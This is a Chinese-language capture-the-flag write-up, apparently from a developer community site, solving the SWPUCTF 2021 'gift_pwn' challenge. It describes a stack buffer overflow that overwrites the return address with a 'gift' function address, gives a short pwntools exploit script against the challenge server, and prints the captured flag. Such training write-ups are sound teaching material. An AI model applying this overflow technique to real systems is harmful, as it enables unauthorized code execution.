开发者社区开发与运维文章正文

[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

2024-08-19 501

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： [SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

按照签到题的套路是找main，buf,shell,bin/sh/，这个是加了一个gift的地址

距离rbp 16字节，我们要再加上我们的8个字节

最后加上我们的返回地址，是上面找到的gift的地址，payload就完成了

from pwn import *
p = remote('node4.anna.nssctf.cn',28325)
payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6)
p.send(payload)
p.interactive()

NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}

文章标签：

Shell

丸卜

白猫a

JSON PHP 数据格式

[SWPUCTF 2021 新生赛]jicao

白猫a

798 0 0

丸卜

Shell

[NISACTF 2022]ezstack-入土为安的第十四天

丸卜

179 0 0

丸卜

Shell

[NISACTF 2022]ezpie- 入土为安的第十五天

丸卜

264 0 0

八百标兵奔北坡

安全 Shell PHP

escapeshellarg() 和 escapeshellcmd()

八百标兵奔北坡

873 3 3

Jay17

PHP

NSS [NISACTF 2022]level-up

Jay17

236 0 0

白猫a

缓存 PHP

[SWPUCTF 2021 新生赛]Do_you_know_http

白猫a

1025 0 0

aliyun6054359135

SQL Python

[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解

aliyun6054359135

1220 0 0

[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解

不拿flag不改名

BUUCTF---数据包中的线索1

不拿flag不改名

780 0 0

aliyun6054359135

SQL 存储安全

CTF--Web安全--SQL注入之报错注入

aliyun6054359135

764 0 0

玥轩

BUUCTF 大白 1

玥轩

483 0 0

[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

热门文章

最新文章

相关电子书

探索云世界

热门

云计算

大数据

云原生

人工智能

数据库

开发与运维

活动广场

任务中心

训练营

直播

乘风者计划

下载

镜像站

技术资料

[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天

热门文章

最新文章

相关电子书